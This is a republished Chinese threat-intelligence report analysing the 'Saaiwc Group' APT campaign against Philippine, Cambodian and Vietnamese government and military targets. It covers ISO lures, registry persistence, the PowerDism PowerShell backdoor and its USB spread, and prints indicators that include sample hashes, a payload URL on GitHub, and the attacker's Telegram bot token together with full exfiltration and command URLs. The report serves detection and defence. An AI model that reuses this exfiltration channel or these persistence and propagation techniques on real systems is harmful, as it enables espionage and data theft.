服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

东南亚地区的新晋势力:新APT组织Saaiwc Group针对东南亚军事、财政等多部门的攻击活动分析

日期: 来源:网络安全研究宅基地收集编辑:猎影实验室

点击蓝字关注我们

事件概述

      2022年11月,安恒信息猎影实验室在威胁狩猎中持续追踪到针对东南亚地区的攻击活动,活动疑似针对菲律宾、柬埔寨、越南地区的军事、财政部门。

      

      攻击活动主要以ISO文件为初始恶意负载,运行后在本机注册表添加Powershell指令,最后加载Powershell后门PowerDism窃取本机信息并执行任意指令。根据样本中的互斥体名称,我们将该组织命名为:Saaiwc Group,内部编号:APT-LY-1005。相关攻击流程如下图:


      经溯源关联分析,我们对该威胁组织的画像分析如下:

组织名称

Saaiwc Group(猎影实验室内部编号:APT-LY-1005)

组织归属

疑似东南亚地区

目标地域

东南亚地区国家(菲律宾、柬埔寨、越南)

目标行业

政府、军事

首次出现

2022年5月

使用工具

PowerDism后门

漏洞利用

CVE-2017-0199


     此次攻击活动大约发生在10月下旬到11月底,我们捕获到的样本信息如下表:

文件名

Hash

其他信息

Updates on AJEX DAGITPA 2022 on 200900 Oct 22.pdf.iso

edcd5ff1c2af9451405d430052c60660

2022-10-19上传针对菲律宾陆军司令部

IPMIS CASCADING CY 202220221003_18510684.pdf(3).iso

a6e085c099d681a71b937631a5e88c06

2022-10-19上传针对菲律宾5ID陆军

MEF_Password_Policy_V001.iso

c6abce3f12c14b7804a2532a3f5199b7

2022-11-25上传针对柬埔寨经济和财政部


      相关文件运行后释放的诱饵文件如下:

诱饵文件1:菲律宾军队 参谋长助理办公室下发的会议通知

诱饵文件2:菲律宾5ID军队 2022年度绩效管理培训通知

诱饵文件3:柬埔寨经济和财政部关于员工密码的管理要求


执行过程

攻击活动中的恶意样本执行流程如下:

1

Steg1 解密Shellcode

2

Steg2 Shellcode功能

Shellcode执行后,将执行以下操作

1

创建互斥体"v653Bmua-53JCY7Vq-tgSAaiwC-SSq3D4b6",防止恶意负载重复运行

2

运行诱饵文件

3

设置环境变量,通过添加注册表项HKCU\Environment\UserInitMprLogonScript执行Windows自动登录脚本,实现持久化驻留。

4

同时设置GUID项,存放与Telegram通信的APIKEY:5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ以及CHATID:5028607068

5

设置文件扩展名.abcd

6

在注册表HKEY_CURRENT_USER\Software\Classes\abcdfile\shell\open\command路径下写入Powershell指令以及加密数据

3

Steg3 解密Powershell指令

对注册表中Powershell指令解密如下


对Powershell指令去混淆之后


对Base64编码后的Powershell指令进一步解码解压,得到最后阶段Powershell后门PowerDism


4

Steg4 PowerDism后门分析

该后门运行后将注册WMI事件,用于实现USB驱动连接时触发以下恶意行为

1

获取可移动磁盘

2

尝试解压%Temp%目录下的xxx.zip文件到%Temp%目录

3

若文件不存在,则下载hxxps://raw.githubusercontent.com/efimovah/abcd/main/xxx.gif

4

将解压后的文件夹复制并重命名到移动磁盘\dism目录

5

创建BAT文件system.bat,写入指令"@echo off cd %cd%dism start dism.exe exit"用于启动xxx.gif中的dism.exe文件

6

将\dism目录下的所有文件属性设置为系统文件属性+隐藏文件属性

7

创建LNK文件用于启动system.bat


     接着获取本机计算机名、用户名、IP归属国家-地区、出口IP地址、本地IP地址、计算机产品名、磁盘设备名、操作系统版本、反病毒产品等


     发送至Telagram-API接口api.telegram.org/bot5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ/sendMessage?chat_id=5028607068&text={cn : (whoami) : (ip.countryCode)-(ip.region) : (ip.query) : ip_local : model : hd : os : type : av :}


      凭据发送后,C2将为当前感染主机分配新的标识


     从Telagram-API接口api.telegram.org/bot5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ/getUpdates获取后续指令执行并回传至Telagram-API接口

api.telegram.org/bot5621584862:AAGG6WcTvFu7ADpnMT42PqwOoKfTqMDQKkQ/sendMessage?chat_id=5028607068&text=$info


      关于指令分发的部分name和task内容如下,我们发现C2将对特定用户执行特定指令。例如,针对DESKTOP-GJ77TNV用户,恶意负载将检索主机OneDrive目录下的文件信息上传至C2


传播途径

      PowerDism后门可通过移动磁盘传播。当检测到移动磁盘存在时,将从Github(https://github.com/efimovah/abcd)获取加密负载,解密并移动至移动磁盘目录,而后创建BAT、LNK文件,使恶意负载随目标机器开机自启。


    恶意文件启动后利用DLL劫持加载目录中DismCore.dll文件。随后解密同目录下的Dism.sys文件,并在内存中加载PowerDism后门以窃取移动磁盘信息。

      加载后的Shellcode与Steg2相同,均为增改注册表键值以植入Powershell指令。Powershell指令功能与上述几乎一致。



溯源关联

      除以上样本外,我们还观察到攻击者于2022年5月针对越南投放的攻击样本。

文件名

文件名

其他信息

Application-Form-YSEALI-Academic-Fellowship.iso

f02a96b84231da7626399ff1ca6fb33f

2022-05-24上传针对越南YSEALI东南亚青年领袖计划

诱饵文件4:东南亚青年领袖计划申请表


      与10-11月攻击样本不同的是,攻击者5月所用的攻击链为CVE-2017-0199漏洞利用加载带有恶意宏代码的远程模板文件。

     宏代码将读取UserForm窗体内容,将Powershell指令写入注册表中,后续恶意行为与上述一致。


      此外,攻击者的Github更新状态,主要集中在上半年3-5月,与下半年10-11月期间,与我们发现的两次攻击活动时间基本吻合。


      进一步对攻击者提交至Github时间进行分析,我们发现攻击者处于UTC+7时区。将相关时间换算成UTC+7时区后的统计图表如下:

      UTC+7时区为中南半岛标准时间,攻击者疑似来自东南亚地区。


 防范建议

      目前安全数据部已具备相关威胁检测能力,对应产品已完成IoC情报的集成:

 ●安恒产品已集成能力:

     针对该事件中的最新IoC情报,以下产品的版本可自动完成更新,若无法自动更新则请联系技术人员手动更新:

(1)AiLPHA分析平台V5.0.0及以上版本

(2)AiNTA设备V1.2.2及以上版本

(3)AXDR平台V2.0.3及以上版本

(4)APT设备V2.0.67及以上版本

(5)EDR产品V2.0.17及以上版本

 ● 安恒云沙盒已集成了该事件中的样本特征:

      用户可通过云沙盒:

https://ti.dbappsecurity.com.cn/sandbox,对可疑文件进行免费分析,并下载分析报告。



安恒安全数据部, 下设猎影实验室、零壹实验室、析安实验室和回声实验室,团队以数据分析与技术研究为核心,致力于数据驱动安全创造用户价值。

猎影实验室


高级威胁研究团队,专注于APT攻击发现、分析、检测、溯源、防御等研究,以及积累了海量的IoC情报数据。

网络安全研究宅基地

扫码关注我们,一群技术宅

相关阅读

  • 注意Libgcc_a挖矿病毒传播!内附自查方法

  • 点击蓝字关注我们一背景近期,我们监测发现一种新型劫持变种病毒,经分析其主体程序为XMrig挖矿病毒家族的变种,该病毒具有较强的顽固性和隐蔽性,难以被查杀,进程杀死后自启动。此
  • Windows平台Flutter桌面应用的底层模块化探索

  • 前言Windows应用开发有着较为丰富和多样的技术选型。C#/WPF 这种偏Native的闭源方案,目前开发人员相对比较小众了。C++/QT 的跨平台框架,C++对于GUI开发来说上手会更难。JavaS
  • 真香啊!又一个打包神器 Nuitka

  • ↓推荐关注↓一. pyinstaller和Nuitka使用感受1.1 使用需求这次也是由于项目需要,要将python的代码转成exe的程序,在找了许久后,发现了2个都能对python项目打包的工具——pyint
  • 浅析Pe2shellcode

  • 编者注:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。前言众所周知,对shellcode免杀是很流行的技术,但是直接对exe的免杀方法相对稀缺,如果我们能将exe转为shell
  • Linux Capabilities利用总结

  • 前言Linux对于权限的管理,系统权限只有root才有,对于普通用户只有一些有限的权限;而对于普通用户如果想进行一些权限以外的操作,之前主要有两种方法:一是通过sudo提权;二是通过SUI
  • 操作系统:文件系统的实现

  • 一、文件系统结构磁盘的逻辑单元为块,内存和磁盘之间的I/O传输以块为单位执行。磁盘的特点1可以原地重写,可以从磁盘上读一块儿,修改该块,并将它写回到原来的位置可以直接访问磁

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章